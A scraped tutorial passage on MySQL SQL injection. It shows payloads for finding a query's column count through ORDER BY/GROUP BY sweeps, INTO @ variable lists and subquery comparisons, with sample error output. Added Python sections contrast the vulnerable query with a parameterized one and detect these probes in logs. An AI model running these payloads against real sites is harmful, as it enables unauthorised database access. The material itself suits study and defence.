SQL injection Knowledge Base-mysql article (3)

Source: Internet
Author: User
Tags: knowledge base

SQL injection Knowledge Base-mysql (2)

Tables and fields

First, detecting the number of fields

ORDER BY / GROUP BY

GROUP BY n / ORDER BY n, increasing n by 1 on each request;

Note:

Both ORDER BY and GROUP BY operate on fields, and a field can be given by its ordinal position.

Keep increasing the number until the response turns into an error.

Although GROUP BY and ORDER BY are different SQL features, both confirm the number of columns in the query in exactly the same way.

Examples

Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1--+    True

Restored query: SELECT username, password, permission FROM Users WHERE id = '1' ORDER BY 1--+

Queries username, password and permission from the Users table for id = 1, then sorts in ascending order by the first field (username).

1' ORDER BY 2--+    True

...

1' ORDER BY 4--+    False, which indicates that the query returns a total of 3 columns

1' UNION SELECT ...
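An added example that is not part of the original article: it places the injection point from the query above beside a parameterized version of the same query, using Python's built-in sqlite3 as a stand-in for MySQL (the error text differs, but the behaviour is the same). The spliced-in value lets ORDER BY 4 reach the parser and fail, while the bound parameter is compared as a literal and the same input simply matches no row. Table contents and the helper names are constructed.

```python
import sqlite3

# Constructed in-memory stand-in for the page's Users table
# (id, username, password, permission).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT, permission TEXT)")
    db.execute("INSERT INTO Users VALUES (1, 'alice', 'x', 'admin')")
    return db

def lookup_vulnerable(db, user_id):
    """The page's query with the value spliced into the SQL text: the injection point."""
    sql = "SELECT username, password, permission FROM Users WHERE id = '%s'" % user_id
    return db.execute(sql).fetchall()

def lookup_safe(db, user_id):
    """Same query, but the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT username, password, permission FROM Users WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def outcome(fn, db, value):
    """'ok' when the query runs, 'error' when the database rejects it: this is
    the True/False signal the ORDER BY column-count probe on this page relies on."""
    try:
        fn(db, value)
        return "ok"
    except sqlite3.Error:
        return "error"

def compare(probe):
    """Run one input through both versions; returns (vulnerable_outcome, safe_outcome)."""
    db = make_db()
    return outcome(lookup_vulnerable, db, probe), outcome(lookup_safe, db, probe)

if __name__ == "__main__":
    for probe in ("1", "1' ORDER BY 3--", "1' ORDER BY 4--"):
        print(repr(probe), compare(probe))
```

With the parameterized query the "ORDER BY 4" input yields an empty result instead of an error, so the column count is no longer observable from the response.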

Based on Error 1

GROUP BY or ORDER BY 1,2,3,4,5 ...

Similar to the method above, the number of fields can be determined with a single request, provided error reporting is enabled.

Examples

SELECT * FROM student WHERE id = 1 ORDER BY 1;    True

SELECT * FROM student WHERE id = 1 ORDER BY 1,2,3,4;    True

SELECT * FROM student WHERE id = 1 ORDER BY 1,2,3,4,5;    Returns ERROR 1054 (42S22): Unknown column '5' in 'order clause'

This indicates that the student table has only 4 columns.

SELECT * FROM student WHERE id = 1 GROUP BY 1,2,3,4,5;    Returns ERROR 1054 (42S22): Unknown column '5' in 'group statement'

This indicates that the student table has only 4 columns.

Based on Error 2

SELECT ... INTO var_list, var_list1, var_list2 ...

1. This method works when error reporting is enabled.

2. It is a practical way to find the number of fields when a LIMIT clause follows the injection point.

Examples

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 UNION SELECT 1 INTO @,@,@    ERROR: The used SELECT statements have a different number of columns

-1 UNION SELECT 1 INTO @    If no error is reported, the query uses a single field

mysql> SELECT name,id1 FROM student LIMIT 1 INTO @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> SELECT name,id1 FROM student LIMIT 1 INTO @,@;
Query OK, 1 row affected (0.00 sec)

Field

Instance

mysql> SELECT name FROM student WHERE id = -1 UNION SELECT 1 INTO @;    The query uses only the name field, so SELECT 1 INTO @ does not produce an error
Query OK, 1 row affected (0.00 sec)

mysql> SELECT name,id1 FROM student WHERE id = -1 UNION SELECT 1,2 INTO @,@;    The two fields name and id1 are used here, so the matching INTO @,@ does not produce an error
Query OK, 1 row affected (0.00 sec)

Examples

Given the query SELECT username, permission FROM Users LIMIT 1,{INJECTION POINT};

1 INTO @,@,@    ERROR: The used SELECT statements have a different number of columns

1 INTO @,@    No error, which indicates that the query has 2 fields

Instance:

SELECT name,id1 FROM student LIMIT 1,1 INTO @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
SELECT name,id1 FROM student LIMIT 1,1 INTO @,@;
Query OK, 1 row affected (0.00 sec)

LIMIT usage:

LIMIT start_position, row_count

SELECT name,id FROM student LIMIT 0, 1;    Takes the first row from the student table
SELECT name,id FROM student LIMIT 1, 1;    Takes the second row from the student table
SELECT name,id FROM student LIMIT 0, 3;    Takes 3 rows from the student table, starting with the first

Based on Error 3

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

Note:

Works in an environment where you know the table name but error echo is not enabled; it returns the number of fields.

Example

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

1 AND (SELECT * FROM student) = 1

Instance:
SELECT name,id FROM student WHERE id = 1 AND (SELECT * FROM student) = 1;
ERROR 1241 (21000): Operand should contain 4 column(s)

SELECT name,id FROM student WHERE id = 1 AND (SELECT * FROM student) = 2;
ERROR 1241 (21000): Operand should contain 4 column(s)
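An added detection example, not from the original article: it scans constructed application and MySQL log lines for the three column-count probe families described on this page (ORDER BY / GROUP BY position sweeps, INTO @ variable lists, and (SELECT * FROM t) = n comparisons) and for the error codes 1054, 1222 and 1241 they trigger, then flags clients that produce several such events. The "client=... param=..." / "client=... db: ..." log format, the regexes and the threshold are assumptions.

```python
import re
from collections import Counter, defaultdict

# Regexes for the three column-count probe families this page describes, matched
# against raw request parameter values as the application logged them (our own
# patterns, not a vendor signature set).
PROBES = {
    "order_group_by_position": re.compile(r"\b(?:ORDER|GROUP)\s+BY\s+\d+(?:\s*,\s*\d+)*", re.I),
    "select_into_vars":        re.compile(r"\bINTO\s+@\w*(?:\s*,\s*@\w*)*", re.I),
    "subquery_column_compare": re.compile(r"\(\s*SELECT\s+\*\s+FROM\s+\w+\s*\)\s*=\s*\d+", re.I),
}
# MySQL error codes that the probes on this page produce.
MYSQL_ERRORS = re.compile(r"ERROR (1054|1222|1241) \(")

def classify(value):
    """Return the names of the probe families found in one parameter value."""
    return [name for name, rx in PROBES.items() if rx.search(value)]

def scan(lines):
    """Assumed log format: 'client=<ip> param=<value>' for application entries and
    'client=<ip> db: <error text>' for database errors. Returns per-client counts."""
    hits = defaultdict(Counter)
    for line in lines:
        m = re.match(r"client=(\S+)\s+(?:param=(.*)|db:\s*(.*))$", line)
        if not m:
            continue
        client, param, dberr = m.groups()
        if param is not None:
            for name in classify(param):
                hits[client][name] += 1
        elif dberr and MYSQL_ERRORS.search(dberr):
            hits[client]["mysql_column_error"] += 1
    return hits

def suspicious(hits, threshold=2):
    """Clients with at least `threshold` probe-related events, sorted for stable output."""
    return sorted(c for c, ctr in hits.items() if sum(ctr.values()) >= threshold)

# Constructed sample log lines (not real traffic).
SAMPLE = [
    "client=10.0.0.5 param=1' ORDER BY 3--+",
    "client=10.0.0.5 param=1' ORDER BY 4--+",
    "client=10.0.0.5 db: ERROR 1054 (42S22): Unknown column '4' in 'order clause'",
    "client=10.0.0.9 param=-1 UNION SELECT 1 INTO @,@,@",
    "client=10.0.0.9 db: ERROR 1222 (21000): The used SELECT statements have a different number of columns",
    "client=10.0.0.7 param=1 AND (SELECT * FROM student) = 1",
    "client=10.0.0.2 param=42",
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for client in suspicious(found):
        print(client, dict(found[client]))
```

Matching the database error log against the application log is what separates a real probe from a user who merely typed "order by" into a search box.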
